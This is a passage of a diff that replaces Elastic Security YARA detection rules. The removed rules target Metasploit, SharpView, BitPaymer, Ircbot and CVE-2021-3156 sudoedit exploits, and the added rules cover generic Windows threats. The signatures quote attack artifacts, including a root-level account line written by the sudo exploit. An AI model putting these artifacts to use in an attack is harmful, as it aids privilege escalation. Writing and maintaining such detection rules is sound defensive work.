"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L733-L751" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f9df83d0b0e06884cdb4a02cd2091ee1fadeabb2ea16ca34cbfef4129ede251f" + logic_hash = "23e1008f222eb94a4bd34372834924377e813dc76efa8544b0dcbe7d3e3addde" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f4957b565d2b86c79281a0d3b2515b9a0c72f9c9c7b03dae18a3619d7e2fc3dc" - threat_name = "MacOS.Trojan.Metasploit" - severity = 100 + fingerprint = "db703a2ddcec989a81b99a67e61f4be34a2b0e55285c2bdec91cd2f7fc7e52f3" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = { 31 C0 99 50 40 50 40 50 52 B0 61 CD 80 0F 82 7D } + $a1 = { 55 8B EC 51 51 56 57 E8 A3 D0 FF FF 83 78 68 00 74 21 FF 75 24 FF 75 20 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 E5 8C FF FF 83 C4 1C 85 C0 75 73 8B 7D 1C 8D 45 F8 50 8D 45 FC 50 57 FF } condition: all of them } -rule ELASTIC_Macos_Trojan_Metasploit_5E5B685F : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_0350Ed31 : FILE MEMORY { meta: - description = "Detects Macos Trojan Metasploit (MacOS.Trojan.Metasploit)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "5e5b685f-1b6b-4102-b54d-91318e418c6c" - date = "2021-10-05" - modified = "2021-10-25" + id = "0350ed31-ed07-4e9a-8488-3765c990f25c" + date = "2024-01-07" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L255-L273" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cdf0a3c07ef1479b53d49b8f22a9f93adcedeea3b869ef954cc043e54f65c3d0" - logic_hash = "003fb4f079b125f37899a2b3cb62d80edd5b3e5ccbed5bc1ea514a4a173d329d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L753-L771" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "008f9352765d1b3360726363e3e179b527a566bc59acecea06bd16eb16b66c5d" + logic_hash = "149dd26466f47b2e7f514bdcc9822470334490da2898840f35fe6b537ce104f6" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "52c41d4fc4d195e702523dd2b65e4078dd967f9c4e4b1c081bc04d88c9e4804f" - severity = 100 + fingerprint = "aac41abf60a16c02c6250c0468c6f707f9771b48da9e78633de7141d09ca23c8" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = { 00 00 F4 90 90 90 90 55 48 89 E5 48 81 EC 60 20 00 00 89 F8 48 8B 0D 74 23 00 } + $a1 = { 35 6A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 6A 29 59 7A 3F } condition: all of them } -rule ELASTIC_Windows_Hacktool_Sharpview_2C7603Ad : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_A1Cef0Cd : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sharpview (Windows.Hacktool.SharpView)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "2c7603ad-27f4-49fc-9fab-f4284620452f" - date = "2022-10-20" - modified = "2022-11-24" + id = "a1cef0cd-a811-4d7b-b24e-7935c0418c7a" + date = "2024-01-08" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpView.yar#L1-L34" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93" - logic_hash = "1f80b2fd6121c2b36742c819a56626af2e1450dac0f62c67d93f09e4e140b75f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L773-L791" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "71f519c6bd598e17e1298d247a4ad37b78685ca6fd423d560d397d34d16b7db8" + logic_hash = "2772906e3a8a088e7c6ea1370af5e5bbe2cbae4f49de9b939524e317be8ddde4" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "379606da5cf6adb58d6a8e693d379252f7987ff295f838df092ce2246da08354" - severity = 100 + fingerprint = "9285f0ea8ed0ceded2f3876ef197b67e8087f7de82a72e0cd9899b05015eee79" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $guid = "22A156EA-2623-45C7-8E50-E864D9FC44D3" ascii wide nocase - $print_str0 = "[Add-DomainObjectAcl] Granting principal {0} rights GUID '{1}' on {2}" ascii wide - $print_str1 = "[Get-NetRDPSession] Error opening the Remote Desktop Session Host (RD Session Host) server for: {0}" ascii wide - $print_str2 = "[Get-WMIProcess] Error enumerating remote processes on '{0}', access likely denied: {1}" ascii wide - $print_str3 = "[Get-WMIRegLastLoggedOn] Error opening remote registry on $Computer. Remote registry likely not enabled." ascii wide - $print_str4 = "[Get-DomainGUIDMap] Error in building GUID map: {e}" ascii wide - $str0 = "^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$" ascii wide - $str1 = "(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(homedirectory=*)(scriptpath=*)(profilepath=*)))" ascii wide - $str2 = "^(CN|OU|DC)=" ascii wide - $str3 = "(|(samAccountName={0})(name={1})(displayname={2}))" ascii wide - $str4 = "^(?:[0-9]{1,3}\\.){3}[0-9]{1,3}$" ascii wide - $str5 = "LDAP://|^CN=.*" ascii wide - $str6 = "(objectCategory=groupPolicyContainer)" ascii wide - $str7 = "\\\\{0}\\SysVol\\{1}\\Policies\\{2}" ascii wide - $str8 = "S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$" ascii wide - $str9 = "^S-1-5-.*-[1-9]\\d{3,}$" ascii wide + $a1 = { 55 8B EC 51 53 8B DA 89 45 FC 8B 45 FC E8 76 00 00 00 33 C0 55 68 F0 A0 41 00 64 FF 30 64 89 20 8B 45 FC 80 78 20 01 74 10 8B 45 FC 8B 40 04 8B D3 E8 CE FC FF FF 40 75 0F 8B 45 FC 8B 40 04 8B } condition: - $guid or ( all of ($str*) and 1 of ($print_str*)) + all of them } -rule ELASTIC_Windows_PUP_Mediaarena_A9E3B4A1 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_E5F4703F : FILE MEMORY { meta: - description = "Detects Windows Pup Mediaarena (Windows.PUP.MediaArena)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "a9e3b4a1-fd87-4f8f-a9d4-d93f9c018270" - date = "2023-06-02" - modified = "2023-06-13" + id = "e5f4703f-e834-4904-9036-a8c5996058c8" + date = "2024-01-09" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_PUP_MediaArena.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c071e0b67e4c105c87b876183900f97a4e8bc1a7c18e61c028dee59ce690b1ac" - logic_hash = "8e52b29f2848498aae2fd7ad35494362d6c07f0e752b628840a256923aca32c7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L793-L811" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "362bda1fad3fefce7d173617909d3c1a0a8e234e22caf3215ee7c6cef6b2743b" + logic_hash = "f81476d5e5a9bcb42b32d6ec3d4b620165f2878c50691ecf59ef6f34b6ad9d1b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0535228889b1d2a7c317a7ce939621d3d20e2a454ec6d31915c25884931d62b9" - severity = 100 + fingerprint = "3072ea028b0716e88820782a2658d1f424d57bd988ccfcc1581991649cf52b19" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "Going to change default browser to be MS Edge ..." wide - $a2 = "https://www.searcharchiver.com/eula" wide - $a3 = "Current default browser is unchanged!" wide - $a4 = "You can terminate your use of the Search Technology and Search Technology services" - $a5 = "The software may also offer to change your current web navigation access points" - $a6 = "{{BRAND_NAME}} may have various version compatible with different platform," - $a7 = "{{BRAND_NAME}} is a powerful search tool" wide + $a1 = { 83 E4 F8 83 EC 08 83 79 14 08 56 57 8B F1 72 02 8B 31 8B 41 10 8B CE 8D 3C 46 8B D7 E8 AC FA FF FF 8B 75 08 2B F8 D1 FF 0F 57 C0 57 50 0F 11 06 8B CE C7 46 10 00 00 00 00 C7 46 14 00 } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Exploit_Rpcjunction_0405253B : FILE +rule ELASTIC_Windows_Generic_Threat_8B790Aba : FILE MEMORY { meta: - description = "Detects Windows Exploit Rpcjunction (Windows.Exploit.RpcJunction)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "0405253b-d91f-420e-b2e5-7f4aebeb7709" - date = "2024-02-28" - modified = "2024-03-21" + id = "8b790aba-02b4-4c71-a51e-3a56ea5728ec" + date = "2024-01-09" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Exploit_RpcJunction.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "05588fe3d2aae1273e9d0b0ac00c867d92bcdea41c33661760dcbe84439e7949" - logic_hash = "c663285d81e00bf6b028cdb043da3c6d5033a0c100d9c626acfa26d67bc1c093" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L813-L832" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ec98bfff01d384bdff6bbbc5e17620b31fa57c662516157fd476ef587b8d239e" + logic_hash = "8a0b2af3d0c95466ca138dfcc3d6f6a702ec92f5cd4f791b1200c79ffd973840" score = 75 - quality = 75 - tags = "FILE" - fingerprint = "bd5f1c040f6fcf16e507d2c3cb94013ea17d85b2428b85ba1d84005cc44739ec" - severity = 100 + quality = 71 + tags = "FILE, MEMORY" + fingerprint = "8581397f15b9985bafa5248f0e7f044bf80c82e441d2216dc0976c806f658d2e" + severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $s1 = "NtSetInformationFile" - $s2 = "DefineDosDevice" - $s3 = "\\GLOBALROOT\\RPC Control\\" wide nocase + $a1 = { 7A 66 62 50 4A 64 73 72 78 77 7B 7B 79 55 36 46 42 50 4A 3F 20 2E 6E 3E 36 65 73 7A } + $a2 = { 50 36 7B 77 64 71 79 64 46 4A 73 64 79 62 45 7A 77 63 62 64 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2021_3156_F3Fb10Cd : FILE CVE_2021_3156 +rule ELASTIC_Windows_Generic_Threat_76A7579F : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2021 3156 (Linux.Exploit.CVE-2021-3156)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "f3fb10cd-1d49-420f-8740-5c8990560943" - date = "2021-09-15" - modified = "2021-09-21" + id = "76a7579f-4a9b-4dae-935c-14d829d3c416" + date = "2024-01-09" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2021_3156.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "65fb8baa5ec3bfb4473e4b2f565b461dd59989d43c72b1c5ec2e1a68baa8b51a" - logic_hash = "cc80e0b2355877cd9ceecae19d4dcebb641d90a24c0751bf706134b31bf26750" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L834-L852" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "76c73934bcff7e4ee08b068d1e02b8f5c22161262d127de2b4ac2e81d09d84f6" + logic_hash = "08ed2d318e7154195911aaf3705626307b48a54aa195eaa054ec53766d3e198d" score = 75 quality = 75 - tags = "FILE, CVE-2021-3156" - fingerprint = "66aca7d13fb9c5495f17b7891e388db0a746d8827c8ae302a6cb8d86f7630bbb" - severity = 100 + tags = "FILE, MEMORY" + fingerprint = "ba5bfc0e012a22172f138c498560a606e6754efa0fa145799f00725e130ad90f" + severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = "/usr/bin/sudoedit" fullword - $a2 = "" fullword + $a1 = { 55 8B EC 8B 55 10 8B 45 08 8B C8 85 D2 74 09 C6 01 00 41 83 EA 01 75 F7 5D C3 55 8B EC 64 A1 30 00 00 00 83 EC 18 8B 40 0C 53 56 57 8B 78 0C E9 A7 00 00 00 8B 47 30 33 F6 8B 5F 2C 8B 3F 89 45 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2021_3156_7F5672D0 : FILE CVE_2021_3156 +rule ELASTIC_Windows_Generic_Threat_3F060B9C : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2021 3156 (Linux.Exploit.CVE-2021-3156)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "7f5672d0-73f1-4143-b3e2-3aed110779e3" - date = "2021-09-15" - modified = "2021-09-21" + id = "3f060b9c-8c35-4f0f-9dfd-10be6355bea9" + date = "2024-01-10" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2021_3156.yar#L22-L45" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1a4517d2582ac97b88ae568c23e75beba93daf8518bd3971985d6a798049fd61" - logic_hash = "e25907f11a2f292441a96e19834ad89636593a3f8998ec0010e43830f5aa0c64" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L854-L872" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "32e7a40b13ddbf9fc73bd12c234336b1ae11e2f39476de99ebacd7bbfd22fba0" + logic_hash = "193583f63f22452f96c8372fdc9ef04e2a684f847564a7fe75145ea30d426901" score = 75 quality = 75 - tags = "FILE, CVE-2021-3156" - fingerprint = "71e90dd36342686bb4be7ef86e1ceb2e915c70f437f4733ddcc5175860ca4084" - severity = 100 + tags = "FILE, MEMORY" + fingerprint = "5bc1d19faa8fc07ef669f6f63baceee5fe452c0e2d54d6154bcc01e11606ae6f" + severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = "/tmp/gogogo123456789012345678901234567890go" fullword - $a2 = "gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash" fullword - $sudo = "sudoedit" fullword - $msg1 = "succes with sleep time %d us" fullword - $msg2 = "[+] Success with %d attempts" fullword - $msg3 = "symlink 2nd time success at: %d" fullword + $a1 = { 55 8B EC 51 51 53 56 8B F1 E8 4B BE FF FF 8D 45 FC 8B CE 50 FF 75 10 FF 75 0C E8 69 FE FF FF 8B D8 8B CE 53 E8 4B FD FF FF 85 C0 0F 84 C6 00 00 00 8B 46 40 83 F8 02 0F 84 B3 00 00 00 83 F8 05 } condition: - ( any of ($a*)) or ($sudo and 2 of ($msg*)) + all of them } -rule ELASTIC_Windows_Ransomware_Bitpaymer_D74273B3 : BETA FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Dbae6542 : FILE MEMORY { meta: - description = "Identifies BITPAYMER ransomware" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "d74273b3-d109-4b5d-beff-dffee9a984b1" - date = "2020-06-25" - modified = "2021-08-23" - reference = "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Bitpaymer.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "126246689b28e92ed10bfa6165f06ff7d4f0e062de7c58b821eaaf5e3cae9306" + id = "dbae6542-b343-4320-884c-c0ce97a431f1" + date = "2024-01-10" + modified = "2024-01-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L874-L892" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c73f533f96ed894b9ff717da195083a594673e218ee9a269e360353b9c9a0283" + logic_hash = "673c6b4e6aaa127d45b21d0283437000fbc507a84ecd7a326448869d63759aee" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "4f913f06f7c7decbeb78187c566674f91ebbf929ad7057641659bb756cf2991b" - threat_name = "Windows.Ransomware.Bitpaymer" - severity = 100 + tags = "FILE, MEMORY" + fingerprint = "880aafd423494eccab31342bdfec392fdf4a7b4d98614a0c3b5302d62bcf5ba8" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $b1 = { 24 E8 00 00 00 29 F0 19 F9 89 8C 24 88 00 00 00 89 84 24 84 00 } + $a1 = { 28 00 00 0A 20 B8 0B 00 00 20 10 27 00 00 6F 29 00 00 0A 28 1F 00 00 0A 7E 0F 00 00 04 2D 0A 28 27 00 00 06 28 19 00 00 06 7E 15 00 00 04 6F 2A 00 00 0A 26 17 2D C8 2A EE 16 80 0F 00 00 04 14 } condition: - 1 of ($b*) + all of them } -rule ELASTIC_Windows_Ransomware_Bitpaymer_Bca25Ac6 : BETA FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_808F680E : FILE MEMORY { meta: - description = "Identifies BITPAYMER ransomware" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "bca25ac6-e351-4823-be75-b0661c89588a" - date = "2020-06-25" - modified = "2021-08-23" - reference = "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Bitpaymer.yar#L22-L48" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "7670f9dafacc8fc5998c1974af66ede388c0997545da067648fec4fd053f0001" + id = "808f680e-db35-488f-b942-79213890b336" + date = "2024-01-10" + modified = "2024-01-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L894-L912" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "df6955522532e365239b94e9d834ff5eeeb354eec3e3672c48be88725849ac1c" + logic_hash = "22d91a87c01b401d4a203fbabb93a9b45fd6d8819125c56d9c427449b06d2f84" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "2ecc7884d47ca7dbba30ba171b632859914d6152601ea7b463c0f52be79ebb8c" - threat_name = "Windows.Ransomware.Bitpaymer" - severity = 100 + tags = "FILE, MEMORY" + fingerprint = "4b4b3b244d0168b11a8df4805f9043c6e4039ced332a7ba9c9d0d962ad6f6a0e" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "RWKGGE.PDB" fullword - $a2 = "*Qf69@+mESRA.RY7*+6XEF#NH.pdb" fullword - $a3 = "04QuURX.pdb" fullword - $a4 = "9nuhuNN.PDB" fullword - $a5 = "mHtXGC.PDB" fullword - $a6 = "S:\\Work\\_bin\\Release-Win32\\wp_encrypt_new.pdb" fullword - $a7 = "C:\\Work\\_bin\\Release-Win32\\wp_encrypt.pdb" fullword - $a8 = "k:\\softcare\\release\\h2O.pdb" fullword + $a1 = { 28 00 00 0A 20 00 00 00 00 FE 01 2A 13 30 02 00 6C 00 00 00 01 00 00 11 20 00 00 00 00 FE 0E 00 00 38 54 00 00 00 00 FE 0C 00 00 20 01 00 00 00 FE 01 39 12 00 00 00 FE 09 01 00 FE 09 02 00 51 } condition: - 1 of ($a*) + all of them } -rule ELASTIC_Windows_Vulndriver_BSMI_65223B8D : FILE +rule ELASTIC_Windows_Generic_Threat_073909Cf : FILE MEMORY { meta: - description = "Name: BSMI.sys, Version: 1.0.0.3" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "65223b8d-451a-4ae6-90cc-17d1482cc834" - date = "2022-04-07" - modified = "2022-04-07" + id = "073909cf-7e0d-48fa-a631-e1b641040570" + date = "2024-01-10" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_BSMI.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347" - logic_hash = "c4fa65bbd9d374092137b65209f29744caeb8b04fbd364b1acc67b73c45604e8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L914-L932" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "89a6dc518c119b39252889632bd18d9dfdae687f7621310fb14b684d2f85dad8" + logic_hash = "5b42a74010549c884ff85a67b9add6b82a8109a953473cc1439581976f8f545e" score = 75 quality = 75 - tags = "FILE" - fingerprint = "9ad213d919719d0fb0a99dcb9863720adec173e9801663e1cf5b99881435914a" - threat_name = "Windows.VulnDriver.BSMI" + tags = "FILE, MEMORY" + fingerprint = "717da3b409c002ff6c6428690faf6e6018daedfaf9ec95b6fb9884cacc27dc20" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 42 00 53 00 4D 00 49 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + $a1 = { 83 C4 F0 53 56 89 55 FC 8B F0 8B 45 FC E8 CF E5 FF FF 33 C0 55 68 F2 39 40 00 64 FF 30 64 89 20 33 DB 68 04 3A 40 00 68 0C 3A 40 00 E8 70 FC FF FF 50 E8 82 FC FF FF 89 45 F8 68 18 3A } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Linux_Trojan_Ircbot_Bb204B81 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_820Fe9C9 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ircbot (Linux.Trojan.Ircbot)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "bb204b81-db58-434f-b834-672cdc25e56c" - date = "2021-04-06" - modified = "2021-09-16" + id = "820fe9c9-2abc-4dd5-84e2-a74fbded4dc6" + date = "2024-01-11" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ircbot.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6147481d083c707dc98905a1286827a6e7009e08490e7d7c280ed5a6356527ad" - logic_hash = "90d211c11281f5f8832210f3fc087fe5ff5a519b9b38628835e8b5fcc560bd9b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L934-L952" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1102a499b8a863bdbfd978a1d17270990e6b7fe60ce54b9dd17492234aad2f8c" + logic_hash = "81a1359bd5781e1eefb6ae06c6b2ad9e94cc6318c1f81f84c06f0b236b6e84d1" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "66f9a8a31653a5e480f427d2d6a25b934c2c53752308eedb57eaa7b7cb7dde2e" - severity = 100 + fingerprint = "e43f4fee9e23233bf8597decac79bda4790b5682f5e0fe86e3a13cb18724ea3e" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 0F 44 C8 4C 5E F8 8D EF 80 83 CD FF 31 DB 30 22 } + $a1 = { 2E 2A 73 74 72 75 63 74 20 7B 20 46 20 75 69 6E 74 70 74 72 3B 20 58 30 20 63 68 61 6E 20 73 74 72 69 6E 67 3B 20 58 31 20 62 6F 6F 6C 20 7D } condition: all of them } -rule ELASTIC_Linux_Trojan_Ircbot_7C60454D : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_89Efd1B4 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ircbot (Linux.Trojan.Ircbot)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "7c60454d-8290-4e91-9b0a-2392aebe1bec" - date = "2022-01-05" - modified = "2022-01-26" + id = "89efd1b4-9a4b-4749-8b34-630883d2d45b" + date = "2024-01-11" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ircbot.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "14eeff3516de6d2cb11d6ada4026e3dcee1402940e3a0fb4fa224a5c030049d8" - logic_hash = "90dcd0a3d3f6345e66db0a4f8465e3830eb4e3bcb675db16c60a89e20f935aec" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L954-L972" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + 